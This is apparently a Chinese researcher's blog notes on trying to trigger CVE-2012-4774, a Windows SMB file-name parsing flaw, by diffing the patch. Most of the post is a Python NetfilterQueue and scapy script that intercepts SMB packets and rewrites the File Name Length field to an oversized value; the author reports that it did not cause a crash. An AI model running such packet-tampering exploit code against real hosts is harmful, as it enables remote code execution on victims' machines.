CVE-2012-4774不崩溃
想让CVE-2012-4774崩溃下,然后继续调试崩溃,结果他丫就是不崩
看了下,http://www.mcafee.com/us/resources/release-notes/foundstone/fsl_12_12_2012.pdf
mcafee说CVE-2012-4774
The flaw lies in the parsing of file names. Successful exploitation could allow an attacker to execute remote code. The exploit
requires the user to browse a file system containing malicious files.
补丁对比下,FindNextFileW存在问题
新的补丁处增加了mov eax,206h,对SMB的File Name Len字段进行了判断,大致知道情况
尝试为这个漏洞写了个修改数据包攻击的代码(samba目录下有个123命名的文件):
''' please increase this in iptables iptables -I OUTPUT -d 192.168.0.0/24 -j NFQUEUE --queue-num 1 ''' from netfilterqueue import NetfilterQueue from scapy.all import * __vis_filter = """................................ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[.]^_`abcdefghijklmnopqrstuvwxyz{|}~.......... .......................................................................................................................""" def hexdump(buf, length=16): """Return a hexdump output string of the given buffer.""" n = 0 res = [] while buf: line, buf = buf[:length], buf[length:] hexa = ' '.join(['%02x' % ord(x) for x in line]) line = line.translate(__vis_filter) res.append(' %04d: %-*s %s' % (n, length * 3, hexa, line)) n += length return '\n'.join(res) #return hexa def print_and_accept(pkt): data = hexdump(pkt.get_payload()) print data pkt.accept() def process(payload): data = payload.get_payload() if data.find('\x06\x00\x00\x00') != -1 and len(data) == 408: data2 = data.replace(data[-40:-36],'\x58\x02\x00\x00') pkt = IP(data2) print hexdump(str(pkt)) send(pkt,verbose=0) payload.drop() else: payload.accept() #payload.accept() def main(): nfqueue = NetfilterQueue() nfqueue.bind(1, process) try: nfqueue.run() except KeyboardInterrupt: print "now exist"
if __name__ == "__main__": main()
结果杯具,没能成功崩溃,唉,继续探索